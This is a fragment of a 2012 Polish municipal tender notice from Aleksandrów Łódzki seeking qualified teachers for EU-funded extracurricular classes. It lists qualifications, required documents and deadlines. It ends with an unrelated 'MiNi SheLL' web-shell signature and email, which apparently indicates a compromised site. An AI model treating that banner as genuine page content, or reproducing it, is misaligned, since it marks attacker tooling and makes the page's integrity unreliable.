wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym - edukacja wczesnoszkolna lub pedagogika wczesnoszkolna, z min. rocznym doświadczeniem w nauczaniu.
Część: 12 - zajęcia teatralne -
wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym - edukacja wczesnoszkolna lub pedagogika wczesnoszkolna lub studium pedagogiczne i studium techniki teatralno-filmowej, z min. rocznym doświadczeniem w nauczaniu. 
Części: 26, 35, 45  - zajęcia plastyczne - 
wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym - edukacja wczesnoszkolna lub pedagogika wczesnoszkolna, z min. rocznym doświadczeniem w nauczaniu. 
Część: 46 - zajęcia muzyczne - 
wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym - edukacja wczesnoszkolna lub pedagogika wczesnoszkolna i przygotowanie muzyczne - kurs gry na flażolecie, z min. rocznym doświadczeniem w nauczaniu. 
Część: 47 - zajęcia taneczne -
wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym - edukacja wczesnoszkolna lub pedagogika wczesnoszkolna i przygotowanie muzyczno-taneczne, z min. rocznym doświadczeniem w nauczaniu.  

W zakresie zajęć rozwijających zainteresowania uczniów szczególnie uzdolnionych sportowo:
Część: 36 - zajęcia sportowe -
wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym - studia podyplomowe z zakresu wychowania fizycznego z min. rocznym doświadczeniem w nauczaniu.
Weryfikacja spełnienia warunku będzie następować na podstawie złożonego oświadczenia zgodnie z wymogiem art. 22 ust. 1 ustawy Prawo zamówień publicznych.(oświadczenia oraz wykaz osób stanowiące załącznik nr 2, nr 3, nr 4 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Weryfikacja spełnienia warunku będzie następować na podstawie złożonego oświadczenia zgodnie z wymogiem art. 22 ust. 1 ustawy Prawo zamówień publicznych.(oświadczenie - stanowiące załącznik nr 2 do SIWZ)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>formularz oferty przetargowej (zał. nr 1 do SIWZ)</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.aleksandrow-lodzki.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Aleksandrowie Łódzkim, Plac Kościuszki 2, 95-070 Aleksandrów Łódzki, pok. 115, 116.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.03.2012 godzina 10:00, miejsce: Biuro Podawcze w Urzędzie Miejskim w Aleksandrowie Łódzkim - pok. 10.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, działanie 9.1, poddziałanie 9.1.2.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com